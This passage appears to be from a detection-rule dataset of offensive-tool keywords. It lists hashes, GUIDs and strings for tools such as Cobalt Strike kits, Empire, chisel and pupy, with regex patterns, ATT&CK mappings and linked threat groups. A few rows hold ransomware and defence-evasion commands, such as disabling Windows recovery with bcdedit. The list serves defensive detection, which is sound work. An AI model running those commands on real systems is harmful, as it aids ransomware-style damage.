"*bc99c9d2b150645abdb37d35c032dab28f5995d505294b0bd2c633525c91c4b0*",".{0,1000}bc99c9d2b150645abdb37d35c032dab28f5995d505294b0bd2c633525c91c4b0.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","35463" "*BC9BC3C3-4FBC-4F36-866C-AC2B4758BEBE*",".{0,1000}BC9BC3C3\-4FBC\-4F36\-866C\-AC2B4758BEBE.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#GUIDproject","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","35464" "*bc9c9c452084648c29a0ce2b6457b0ddf03bf4f63d939797b10eabb4b470e31b*",".{0,1000}bc9c9c452084648c29a0ce2b6457b0ddf03bf4f63d939797b10eabb4b470e31b.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","35465" "*bca1f1c7d9253bafb3442c4dd95a0b18a82be404ab9442a373b2ff91a47f5164*",".{0,1000}bca1f1c7d9253bafb3442c4dd95a0b18a82be404ab9442a373b2ff91a47f5164.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","35466" 
"*bca5760a0654e457801cbc90c173703da7b359376a5c8855d1e7bd451a0e421b*",".{0,1000}bca5760a0654e457801cbc90c173703da7b359376a5c8855d1e7bd451a0e421b.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","0","#filehash","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","35469" "*bca7426a0e36d0d3066811d3e372c8599650eabaed51495aac776c9a28cff99e*",".{0,1000}bca7426a0e36d0d3066811d3e372c8599650eabaed51495aac776c9a28cff99e.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","35470" "*bcaea27cde09d870a66d227e61d4be463e0d943831c8728612489b0587e34676*",".{0,1000}bcaea27cde09d870a66d227e61d4be463e0d943831c8728612489b0587e34676.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","#filehash","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","35471" "*bcaf32b547ce962291c3e905b9fe6dd2df389b19da01dedff9bd7b2bb5b71039*",".{0,1000}bcaf32b547ce962291c3e905b9fe6dd2df389b19da01dedff9bd7b2bb5b71039.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF 
bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","35472" "*bcb11a82c2649c468c4b130cb209a42d63d34909373e7e34a4fd80bcfbe19222*",".{0,1000}bcb11a82c2649c468c4b130cb209a42d63d34909373e7e34a4fd80bcfbe19222.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","35473" "*bcb2e399281a97256985eae807d94d8656c0b76ab2aed4ca200e57acb3b07eea*",".{0,1000}bcb2e399281a97256985eae807d94d8656c0b76ab2aed4ca200e57acb3b07eea.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","35474" "*bcbafa4b6f4c3897ce7705a05c10d1aa10601a2dc212cb63ff6bf80e86a2f25d*",".{0,1000}bcbafa4b6f4c3897ce7705a05c10d1aa10601a2dc212cb63ff6bf80e86a2f25d.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35476" 
"*BCBC884D-2D47-4138-B68F-7D425C9291F9*",".{0,1000}BCBC884D\-2D47\-4138\-B68F\-7D425C9291F9.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","#GUIDproject","N/A","10","1","33","7","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z","35477" "*bcc2_setenv*",".{0,1000}bcc2_setenv.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - 
Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","35481" "*bcc2_spawn*",".{0,1000}bcc2_spawn.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang 
- menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","35482" "*bcd23b279a6821e726d190afb11762f53741de0c8ee4724925a3c908e55725b5*",".{0,1000}bcd23b279a6821e726d190afb11762f53741de0c8ee4724925a3c908e55725b5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","35485" "*bcdb12d84f9915e48e5c453e8aac9be685750e11851dea0c96967ccc61f19e57*",".{0,1000}bcdb12d84f9915e48e5c453e8aac9be685750e11851dea0c96967ccc61f19e57.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35488" "*bcdedit /set hypervisorlaunchtype off*",".{0,1000}bcdedit\s\/set\shypervisorlaunchtype\soff.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","N/A","N/A","7","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","35492" "*bcdedit.exe /set {default} recoveryenabled No*",".{0,1000}bcdedit\.exe\s\/set\s\{default\}\srecoveryenabled\sNo.{0,1000}","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - 
TA0040","N/A","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","FIN7","10","10","N/A","N/A","N/A","N/A","35495" "*bce36da8d85f5bd0c1f0c6f922cc23f943a98cc6e5feea7d307121b68971f969*",".{0,1000}bce36da8d85f5bd0c1f0c6f922cc23f943a98cc6e5feea7d307121b68971f969.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35496" "*BCE48DAE-232E-4B3D-B5B5-D0B29BB7E9DE*",".{0,1000}BCE48DAE\-232E\-4B3D\-B5B5\-D0B29BB7E9DE.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","35497" "*bced4fc981001259eacc23145a5968deda2cfaf64db8e3ffebf2b6ae5bcda874*",".{0,1000}bced4fc981001259eacc23145a5968deda2cfaf64db8e3ffebf2b6ae5bcda874.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","35500" "*bcfe13901d4207db340d957052cd5175e24481a5e2c5fc15d119fadedc664755*",".{0,1000}bcfe13901d4207db340d957052cd5175e24481a5e2c5fc15d119fadedc664755.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - 
T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","35503" "*BCHASH-Rijndael-128.unverified.test-vectors.txt*",".{0,1000}BCHASH\-Rijndael\-128\.unverified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","35504" "*BCHASH-Rijndael-256.unverified.test-vectors.txt*",".{0,1000}BCHASH\-Rijndael\-256\.unverified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","35505" "*bcrossc2_load_dyn*",".{0,1000}bcrossc2_load_dyn.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","35506" "*BC-SECURITY*",".{0,1000}BC\-SECURITY.{0,1000}","offensive_tool_keyword","Github Username","Cybersecurity Engineers and Offensive Security enthusiasts actively maintaining/updating Powershell Empire in our spare time.","T1021 - T1024 - T1027 - T1059 - T1074 - T1053","TA0008 - TA0003 - TA0006","N/A","N/A","Exploitation tool","https://github.com/BC-SECURITY","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","35507" "*BC-SECURITY*Malleable*",".{0,1000}BC\-SECURITY.{0,1000}Malleable.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 Profiles. 
A collection of profiles used in different projects using Cobalt Strike & Empire.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","35508" "*bc-security/empire*",".{0,1000}bc\-security\/empire.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - 
T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","35509" "*bcsecurity/empire:latest*",".{0,1000}bcsecurity\/empire\:latest.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - 
T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","35510" "*BC-SECURITY/Moriarty*",".{0,1000}BC\-SECURITY\/Moriarty.{0,1000}","offensive_tool_keyword","Moriarty","Moriarty is designed to enumerate missing KBs - detect various vulnerabilities and suggest potential exploits for Privilege Escalation in Windows environments.","T1068 - T1083","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/BC-SECURITY/Moriarty","1","1","N/A","N/A","7","6","510","67","2024-08-07T15:06:31Z","2023-12-11T14:15:33Z","35511" "*BC-SECURITY/ScriptBlock-Smuggling*",".{0,1000}BC\-SECURITY\/ScriptBlock\-Smuggling.{0,1000}","offensive_tool_keyword","ScriptBlock-Smuggling","SCRIPTBLOCK SMUGGLING: SPOOFING POWERSHELL SECURITY LOGS AND BYPASSING AMSI WITHOUT REFLECTION OR PATCHING","T1059.001 - T1562.001 - T1112 - T1202 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/BC-SECURITY/ScriptBlock-Smuggling","1","1","N/A","N/A","8","1","89","13","2024-06-18T08:35:50Z","2024-06-12T21:44:47Z","35512" "*BC-SECURITY/Starkiller*",".{0,1000}BC\-SECURITY\/Starkiller.{0,1000}","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. 
It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","10","1461","206","2025-03-25T03:30:16Z","2020-03-09T05:48:58Z","35513" "*bd02d9315cbe275ea1057def4ddf72731ce486980ad768591796a0c112032e80*",".{0,1000}bd02d9315cbe275ea1057def4ddf72731ce486980ad768591796a0c112032e80.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","35514" "*bd08e85390117b2c3fecc447cd3009e3fff3d402e6853f5d06bf710b5cab1bca*",".{0,1000}bd08e85390117b2c3fecc447cd3009e3fff3d402e6853f5d06bf710b5cab1bca.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation 
Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","35516" "*bd0f5440775fe02946ffc659425427ef167a1dd6d2993606d4376422f8d33bc4*",".{0,1000}bd0f5440775fe02946ffc659425427ef167a1dd6d2993606d4376422f8d33bc4.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","35517" "*bd1d18a030c57cd3c5827be08135daaa3bd79a83150928ef6349d07cd12f2b3e*",".{0,1000}bd1d18a030c57cd3c5827be08135daaa3bd79a83150928ef6349d07cd12f2b3e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","35520" "*bd326bcb0c8473cbae427c5e7cdfdb9b9cdab27d0df73f67c704eeb962f8db96*",".{0,1000}bd326bcb0c8473cbae427c5e7cdfdb9b9cdab27d0df73f67c704eeb962f8db96.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
